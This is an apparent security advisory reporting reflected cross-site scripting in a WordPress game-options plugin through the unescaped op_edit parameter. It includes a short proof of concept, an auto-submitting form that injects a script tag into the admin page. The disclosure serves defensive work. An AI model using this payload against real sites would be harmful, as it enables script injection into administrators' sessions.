The plugin does not escape the op_edit POST parameter before outputting it back in multiple Game Option pages, leading to Reflected Cross-Site Scripting issues
Affected pages: op=engines, op=perspectives, op=modes, op=genres, op=themes, op=platforms <form action="https://example.com/wp-admin/admin.php?page=gp-ops&op=modes&id=test" method="post" name="test"> <input type="text" name="op_edit" value="<script>alert('xss')</script>"> <button type="submit"></button> </form> <script> document.test.submit(); </script>
2021-09-20 (about 10 months ago)
2021-09-20 (about 10 months ago)
2022-04-08 (about 4 months ago)